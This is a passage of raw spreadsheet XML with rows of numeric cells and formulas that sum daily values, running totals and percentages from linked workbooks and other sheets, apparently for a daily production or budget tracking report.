      </c>
      <c r="T30" s="209">
        <f>'[12]31'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]31'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]31'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]31'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]31'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]31'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]31'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]31'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]31'!$E$16</f>
        <v>2931</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'30'!H31</f>
        <v>137253</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1510260</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]31'!$I$16</f>
        <v>5010.97000000001</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'30'!K31</f>
        <v>153523.14</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1509571.27</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]31'!$L$16</f>
        <v>49159.23</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>65.54564</v>
      </c>
      <c r="O31" s="222"/>
      <c r="P31" s="223"/>
      <c r="Q31" s="224"/>
      <c r="R31" s="209"/>
      <c r="S31" s="226"/>
      <c r="T31" s="209"/>
      <c r="U31" s="209"/>
      <c r="V31" s="209"/>
      <c r="W31" s="209"/>
      <c r="X31" s="209"/>
      <c r="Y31" s="209"/>
      <c r="Z31" s="209"/>
    </row>
    <row r="32" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A32" s="191"/>
      <c r="B32" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C32" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D32" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E32" s="194">
        <v>200000</v>
      </c>
      <c r="F32" s="194">
        <f>'[11]31'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]31'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'30'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]31'!$I$13</f>
        <v>2078</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'30'!K32</f>
        <v>101199</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1122677</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]31'!$L$13</f>
        <v>36724.806</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>73.449612</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]31'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]31'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]31'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]31'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]31'!$U$76</f>
        <v>4.03225806451613e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]31'!$V$76</f>
        <v>4.10958904109589e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]31'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]31'!$R$76</f>
        <v>3e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]31'!$S$76</f>
        <v>3.6e-9</v>
      </c>
    </row>
    <row r="33" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]31'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'30'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]31'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'30'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]31'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]31'!$W$77</f>
        <v>21.89</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]31'!$X$77</f>
        <v>21.1</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]31'!$Y$77</f>
        <v>19.83</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]31'!$T$77</f>
        <v>100.000000000042</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]31'!$U$77</f>
        <v>33.3642473118293</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]31'!$V$77</f>
        <v>60.5941780821931</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]31'!$Q$77</f>
        <v>24.00000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]31'!$R$77</f>
        <v>248.23000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]31'!$S$77</f>
        <v>5308.05000000012</v>
      </c>
    </row>
    <row r="34" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]31'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'30'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]31'!$I$50</f>
        <v>0</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'30'!K34</f>
        <v>25587.7</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>492790.63</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]31'!$L$15</f>
        <v>0</v>
      </c>
      <c r="N34" s="195"/>
      <c r="O34" s="222"/>
      <c r="P34" s="223"/>
      <c r="Q34" s="224"/>
      <c r="R34" s="209"/>
      <c r="S34" s="209"/>
      <c r="T34" s="209"/>
      <c r="U34" s="209"/>
      <c r="V34" s="209"/>
      <c r="W34" s="209"/>
      <c r="X34" s="209"/>
      <c r="Y34" s="209"/>
      <c r="Z34" s="209"/>
    </row>
    <row r="35" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A35" s="191"/>
      <c r="B35" s="193"/>
      <c r="C35" s="193"/>
      <c r="D35" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E35" s="194"/>
      <c r="F35" s="194"/>
      <c r="G35" s="194">
        <f>'[11]31'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'30'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]31'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'30'!K35</f>
        <v>0</v>
      </c>
      <c r="L35" s="194">
        <f>K35+yc!L35</f>
        <v>0</v>
      </c>
      <c r="M35" s="225"/>
      <c r="N35" s="195"/>
      <c r="O35" s="222"/>
      <c r="P35" s="193"/>
      <c r="Q35" s="193"/>
      <c r="R35" s="227"/>
      <c r="S35" s="227"/>
      <c r="T35" s="227"/>
      <c r="U35" s="227"/>
      <c r="V35" s="227"/>
      <c r="W35" s="227"/>
      <c r="X35" s="227"/>
      <c r="Y35" s="227"/>
      <c r="Z35" s="227"/>
    </row>
    <row r="36" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A36" s="191"/>
      <c r="B36" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C36" s="193"/>
      <c r="D36" s="193"/>
      <c r="E36" s="194"/>
      <c r="F36" s="194"/>
      <c r="G36" s="194"/>
      <c r="H36" s="194">
        <f>G36+'30'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'30'!K36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s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A37" s="191"/>
      <c r="B37" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C37" s="193"/>
      <c r="D37" s="193"/>
      <c r="E37" s="194">
        <v>150000</v>
      </c>
      <c r="F37" s="194"/>
      <c r="G37" s="194"/>
      <c r="H37" s="194">
        <f>G37+'30'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'30'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]31'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]31'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]31'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'29'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]31'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'29'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]31'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'30'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'30'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]31'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]31'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]31'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'29'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]31'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'29'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]31'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'30'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'30'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]31'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]31'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]31'!$R$50</f>
        <v>0</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'29'!U39</f>
        <v>9227.06</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>88040.659</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]31'!$V$50</f>
        <v>210</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'29'!X39</f>
        <v>9177</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>87936</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]31'!$Y$50</f>
        <v>1768.006</v>
      </c>
    </row>
    <row r="40" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'30'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'30'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]31'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]31'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]31'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]31'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]31'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]31'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]31'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]31'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]31'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]31'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]31'!$E$16</f>
        <v>2200</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'30'!H41</f>
        <v>24414</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>149390</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]31'!$I$16</f>
        <v>1039.67</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'30'!K41</f>
        <v>27253.05</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>148646.59</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]31'!$L$16</f>
        <v>23290.71</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>77.6357</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]31'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]31'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]31'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'29'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]31'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'29'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]31'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]31'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]31'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'30'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]31'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'30'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]31'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]31'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]31'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]31'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'29'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]31'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'29'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]31'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]31'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]31'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'30'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]31'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'30'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]31'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N43" s="212"/>
      <c r="O43" s="200"/>
      <c r="P43" s="215"/>
      <c r="Q43" s="193" t="s">
        <v>281</v>
      </c>
      <c r="R43" s="241"/>
      <c r="S43" s="238"/>
      <c r="T43" s="238"/>
      <c r="U43" s="234"/>
      <c r="V43" s="235"/>
      <c r="W43" s="235"/>
      <c r="X43" s="234"/>
      <c r="Y43" s="235"/>
      <c r="Z43" s="238"/>
    </row>
    <row r="44" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A44" s="191"/>
      <c r="B44" s="193"/>
      <c r="C44" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D44" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E44" s="194"/>
      <c r="F44" s="194"/>
      <c r="G44" s="225">
        <f>'[12]31'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'30'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]31'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'30'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]31'!$L$15</f>
        <v>48773.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]31'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]31'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]31'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'29'!U44</f>
        <v>7190.1</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>71943.268</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]31'!$V$29</f>
        <v>125</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'29'!X44</f>
        <v>5409</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>71819</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]31'!$Y$29</f>
        <v>4186.277</v>
      </c>
    </row>
    <row r="45" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]31'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'30'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]31'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'30'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]31'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]31'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]31'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]31'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]31'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]31'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]31'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]31'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]31'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'30'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'30'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]31'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]31'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]31'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'29'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]31'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'29'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]31'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'30'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'30'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]31'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]31'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]31'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'29'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]31'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'29'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]31'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
